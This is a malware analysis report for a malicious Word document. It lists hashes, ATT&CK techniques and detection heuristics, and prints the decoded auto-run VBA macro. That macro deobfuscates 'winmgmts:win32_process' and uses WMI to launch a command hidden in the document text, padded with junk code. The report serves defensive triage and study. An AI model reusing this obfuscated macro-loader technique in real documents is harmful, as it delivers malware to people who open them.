Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 1992656dc5ce0a21…

MALICIOUS

Office (OLE) / .DOC

86.3 KB Created: 2020-12-29 14:41:00 Authoring application: Microsoft Office Word First seen: 2026-05-20
MD5: ded78c7a75cf562048d3e115eabeeb26 SHA-1: 3739ad20de37d0421978f6de8f0835c7a8b7eb57 SHA-256: 1992656dc5ce0a21c226ca246fcc8c7f820976151efab0abcf3e367007523a2a
112 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1047 WMI

The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The macro attempts to open and read from multiple local file paths, suggesting it may be part of a larger exploit chain or payload delivery mechanism. The presence of 'CreateObject' calls further supports the execution of arbitrary code.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Q_4n_ya4yiwxetc = CreateObject(R6b4ccswmlvumx)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8206 bytes
SHA-256: 80ae34b1231786cce2024dcc6c2e2cffab5869416c48cb5fb08aeea249250618
Detection
ClamAV: No threats found
Obfuscation or payload: likely
113 of 202 identifiers look randomly generated (e.g. 'Buy3ztoge3wcykp4') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Qd_4ljyi5y20"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
T8dhywc1tfaz639g
End Sub

Attribute VB_Name = "O3ou8d7jy2pk0u"
   

Attribute VB_Name = "Idz6onmd3sgu1i07yn"
Function T8dhywc1tfaz639g()
On Error Resume Next
mKbjhqs = Qd_4ljyi5y20.StoryRanges.Item(244 / 244)
   GoTo ggDyY
Dim QJIoRCCTD() As Byte
Dim HiwNAGIA As Integer
HiwNAGIA = FreeFile
Open "F:\VRcjFSY\BUCVH\xhHZdhHBN.QSsWFFJR" For Binary Access Read As #HiwNAGIA
Open "O:\XMUKF\HOODi\ujgfjJyl.bJwQqgjC" For Binary Access Read As #HiwNAGIA
ReDim QJIoRCCTD(1 To LOF(intGend) - 5)
Get #HiwNAGIA, , QJIoRCCTD
Get #HiwNAGIA, , QJIoRCCTD
Get #HiwNAGIA, , QJIoRCCTD
Close #HiwNAGIA
ggDyY:
snahbsd = "]b2[sp]b2[s"
B96b1ajff94 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
   GoTo pgGgi
Dim EFhrHY() As Byte
Dim GaGzNcY As Integer
GaGzNcY = FreeFile
Open "F:\qMIvBCBE\eOfgRGkoE\NEMWJEICG.AQoaDEiGA" For Binary Access Read As #GaGzNcY
Open "O:\zvMek\TUaeJ\GijXHS.hJJbEP" For Binary Access Read As #GaGzNcY
ReDim EFhrHY(1 To LOF(intGend) - 5)
Get #GaGzNcY, , EFhrHY
Get #GaGzNcY, , EFhrHY
Get #GaGzNcY, , EFhrHY
Close #GaGzNcY
pgGgi:
Buy3ztoge3wcykp4 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
   GoTo DbcJHeYYL
Dim gXOmF() As Byte
Dim AjzZYId As Integer
AjzZYId = FreeFile
Open "F:\LuQDBHDEF\OeACpAZ\iJriBEAa.lCiojd" For Binary Access Read As #AjzZYId
Open "O:\PXyrHCm\tGFbD\yPsfFBGGq.qImglUCqo" For Binary Access Read As #AjzZYId
ReDim gXOmF(1 To LOF(intGend) - 5)
Get #AjzZYId, , gXOmF
Get #AjzZYId, , gXOmF
Get #AjzZYId, , gXOmF
Close #AjzZYId
DbcJHeYYL:
Fza0r3mqeq1hqbf = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
   GoTo hbbfCDcZ
Dim XFuaIB() As Byte
Dim NnuAG As Integer
NnuAG = FreeFile
Open "F:\UNzXEFeX\tBHkC\XFmxPvDA.jzSGOFC" For Binary Access Read As #NnuAG
Open "O:\IORRBA\VCPjIQC\vhcRJ.VuKMJJCFD" For Binary Access Read As #NnuAG
ReDim XFuaIB(1 To LOF(intGend) - 5)
Get #NnuAG, , XFuaIB
Get #NnuAG, , XFuaIB
Get #NnuAG, , XFuaIB
Close #NnuAG
hbbfCDcZ:
Urbal2rzukfjj = "]b2[ss]b2[s"
   GoTo doEAlEA
Dim FkxZTGOv() As Byte
Dim vqPbH As Integer
vqPbH = FreeFile
Open "F:\FHMRA\qVZABGBH\aesOHHuE.dbVbo" For Binary Access Read As #vqPbH
Open "O:\pbNVxP\kkHRXcFJI\cdPKF.oMKSoJJGB" For Binary Access Read As #vqPbH
ReDim FkxZTGOv(1 To LOF(intGend) - 5)
Get #vqPbH, , FkxZTGOv
Get #vqPbH, , FkxZTGOv
Get #vqPbH, , FkxZTGOv
Close #vqPbH
doEAlEA:
U88bkdzss44 = Fza0r3mqeq1hqbf + Urbal2rzukfjj + Buy3ztoge3wcykp4 + snahbsd + B96b1ajff94
   GoTo njoTEE
Dim AnbIitGG() As Byte
Dim DmCmD As Integer
DmCmD = FreeFile
Open "F:\LIstAre\sgNeFIC\OCGCJBAI.eCFtUByJS" For Binary Access Read As #DmCmD
Open "O:\pDEtH\tSRcQCJ\MNLAKZ.ptsBJK" For Binary Access Read As #DmCmD
ReDim AnbIitGG(1 To LOF(intGend) - 5)
Get #DmCmD, , AnbIitGG
Get #DmCmD, , AnbIitGG
Get #DmCmD, , AnbIitGG
Close #DmCmD
njoTEE:
R6b4ccswmlvumx = Octr6jprbp1_fe(U88bkdzss44)
   GoTo sJQaBUG
Dim XNSSDQ() As Byte
Dim ADuDfBuJe As Integer
ADuDfBuJe = FreeFile
Open "F:\yTMgCA\LdLdHA\NmXyeIDyB.vbsdbGI" For Binary Access Read As #ADuDfBuJe
Open "O:\lNagKI\yrVFAJBWJ\yOQdkvyw.XOgWJ" For Binary Access Read As #ADuDfBuJe
ReDim XNSSDQ(1 To LOF(intGend) - 5)
Get #ADuDfBuJe, , XNSSDQ
Get #ADuDfBuJe, , XNSSDQ
Get #ADuDfBuJe, , XNSSDQ
Close #ADuDfBuJe
sJQaBUG:
Set Q_4n_ya4yiwxetc = CreateObject(R6b4ccswmlvumx)
   GoTo QIeLAbIH
Dim RwhdALK() As Byte
Dim aQvSF As Integer
aQvSF = FreeFile
Open "F:\FHabq\HKdMLiJ\nfsdt.juXUf" For Binary Access Read As #aQvSF
Open "O:\qvTuwDg\PYDtUC\PYvDRCsGB.pmBYAoSx" For Binary Access Read As #aQvSF
ReDim RwhdALK(1 To LOF(intGend) - 5)
Get #aQvSF, , RwhdALK
Get #aQvSF, , RwhdALK
Get #aQvSF, , RwhdALK
Close #aQvSF
QIeLAbIH:
Mfmqyqy318y = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
   GoTo HBYrX
Dim henXvIFBS() As Byte
Dim IZgaeHE As Integer
IZgaeHE = FreeFile
Open "F:\WDXeERv\CaceCE\jEaXB.DyNCDAx" For Binary Access Read As #IZgaeHE
Open "O:\NCEzFJqD\fBoWfA\PTVaGGIgB.yhsJKEG" For Binary Access Read As #IZgaeHE
ReDim henXvIFBS(1 To LOF(intGend) - 5)
Get #IZgaeHE, , henXvIFBS
Get #IZgaeHE, , henXvIFBS
Get #IZgaeHE, , henXvIFBS
Close #IZgaeHE
HBYrX:
   GoTo kTTUerjW
Dim JRFoGAG() As Byte
Dim JhhBQ As Integer
JhhBQ = FreeFile
Open "F:\kEItIJ\MohLTCDli\jUdyJzDGI.MncIPOBF" For Binary Access Read As #JhhBQ
Open "O:\uNvOxl\gMUjlgC\pQzBDo.yovuAWBFE" For Binary Access Read As #JhhBQ
ReDim JRFoGAG(1 To LOF(intGend) - 5)
Get #JhhBQ, , JRFoGAG
Get #JhhBQ, , JRFoGAG
Get #JhhBQ, , JRFoGAG
Close #JhhBQ
kTTUerjW:
Q_4n_ya4yiwxetc.Create Octr6jprbp1_fe(Mfmqyqy318y), Hj4nq52vwv9f8y87, Pvpfok2a7k9xaa
   GoTo bveEDth
Dim PwaItR() As Byte
Dim zzcRDUqvI As Integer
zzcRDUqvI = FreeFile
Open "F:\dFvtFeDQ\nUYeAkH\EtZvqgBD.qFiDWe" For Binary Access Read As #zzcRDUqvI
Open "O:\CLtNZJAX\vvzuMU\nAjQJ.cTYmFItC" For Binary Access Read As #zzcRDUqvI
ReDim PwaItR(1 To LOF(intGend) - 5)
Get #zzcRDUqvI, , PwaItR
Get #zzcRDUqvI, , PwaItR
Get #zzcRDUqvI, , PwaItR
Close #zzcRDUqvI
bveEDth:
   GoTo PCqqvQAH
Dim JSuKFROhF() As Byte
Dim iegMCId As Integer
iegMCId = FreeFile
Open "F:\QMahSB\rnmqE\XJrbTICrA.ZhnfDjDAD" For Binary Access Read As #iegMCId
Open "O:\NoWJDWuEo\vNOaFSF\uHZaO.VaicEH" For Binary Access Read As #iegMCId
ReDim JSuKFROhF(1 To LOF(intGend) - 5)
Get #iegMCId, , JSuKFROhF
Get #iegMCId, , JSuKFROhF
Get #iegMCId, , JSuKFROhF
Close #iegMCId
PCqqvQAH:
End Function
Function Octr6jprbp1_fe(D_us7hrz6rti5ho)
On Error Resume Next
   GoTo AdwWDJ
Dim sGsWI() As Byte
Dim rFzXGH As Integer
rFzXGH = FreeFile
Open "F:\ZilHAFGBD\ODkgRKE\LHeOy.YcnGDGhC" For Binary Access Read As #rFzXGH
Open "O:\zbHkEaHIP\zNMRr\ICNoDJnLi.CtYwUEBIQ" For Binary Access Read As #rFzXGH
ReDim sGsWI(1 To LOF(intGend) - 5)
Get #rFzXGH, , sGsWI
Get #rFzXGH, , sGsWI
Get #rFzXGH, , sGsWI
Close #rFzXGH
AdwWDJ:
A01la80dgscfa = (D_us7hrz6rti5ho)
   GoTo PMoOjD
Dim NLXPBzMI() As Byte
Dim QQGyFm As Integer
QQGyFm = FreeFile
Open "F:\ZedwDsgNG\wHXOue\ofzXAzAG.mVKkRWO" For Binary Access Read As #QQGyFm
Open "O:\SOUbyJAFD\jfAYHx\IvhXd.sDWWF" For Binary Access Read As #QQGyFm
ReDim NLXPBzMI(1 To LOF(intGend) - 5)
Get #QQGyFm, , NLXPBzMI
Get #QQGyFm, , NLXPBzMI
Get #QQGyFm, , NLXPBzMI
Close #QQGyFm
PMoOjD:
Bu9gc8mls85dp = Oowtvwcxwjxa6(A01la80dgscfa)
   GoTo nvAADJJ
Dim pfhZzoE() As Byte
Dim SWcVEbM As Integer
SWcVEbM = FreeFile
Open "F:\liJAk\RGRCpHF\bNAspSF.QynCsII" For Binary Access Read As #SWcVEbM
Open "O:\sPxcF\DAIiBQ\jPGbmHl.tjpwIinBn" For Binary Access Read As #SWcVEbM
ReDim pfhZzoE(1 To LOF(intGend) - 5)
Get #SWcVEbM, , pfhZzoE
Get #SWcVEbM, , pfhZzoE
Get #SWcVEbM, , pfhZzoE
Close #SWcVEbM
nvAADJJ:
Octr6jprbp1_fe = Bu9gc8mls85dp
   GoTo VcWvDJdbs
Dim ZcMmCMG() As Byte
Dim YCjOP As Integer
YCjOP = FreeFile
Open "F:\PodBDaJlA\mxXKEFlDx\cWSMHMW.RYLUJVJe" For Binary Access Read As #YCjOP
Open "O:\yTygPHjf\rcIqUUJv\aEEXdsGyw.HLUGDGQ" For Binary Access Read As #YCjOP
ReDim ZcMmCMG(1 To LOF(intGend) - 5)
Get #YCjOP, , ZcMmCMG
Get #YCjOP, , ZcMmCMG
Get #YCjOP, , ZcMmCMG
Close #YCjOP
VcWvDJdbs:
End Function
Function Oowtvwcxwjxa6(Aofjuh7kd7ne3go3i)
W_ogn6u_usbxc4xj = Kv18y25p6zgn
   GoTo BxuXBgoCG
Dim PQrji() As Byte
Dim hEhFWs As Integer
hEhFWs = FreeFile
Open "F:\cmfYg\atxFn\GJhjFxODz.eAJtV" For Binary Access Read As #hEhFWs
Open "O:\NnAIBDEeI\FPyBAJheE\aSQQR.xGDrEjWc" For Binary Access Read As #hEhFWs
ReDim PQrji(1 To LOF(intGend) - 5)
Get #hEhFWs, , PQrji
Get #hEhFWs, , PQrji
Get #hEhFWs, , PQrji
Close #hEhFWs
BxuXBgoCG:
Oowtvwcxwjxa6 = Replace(Aofjuh7kd7ne3go3i, "]b2[s", Zceoendy3hd)
   GoTo LreOe
Dim kAfLCGBr() As Byte
Dim ePaCEHC As Integer
ePaCEHC = FreeFile
Open "F:\SeKiCHC\XhvwD\eMPhCFH.kPaPI" For Binary Access Read As #ePaCEHC
Open "O:\INXLDyuC\quuLASn\TKWvDFjV.sKbYEBAAk" For Binary Access Read As #ePaCEHC
ReDim kAfLCGBr(1 To LOF(intGend) - 5)
Get #ePaCEHC, , kAfLCGBr
Get #ePaCEHC, , kAfLCGBr
Get #ePaCEHC, , kAfLCGBr
Close #ePaCEHC
LreOe:
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.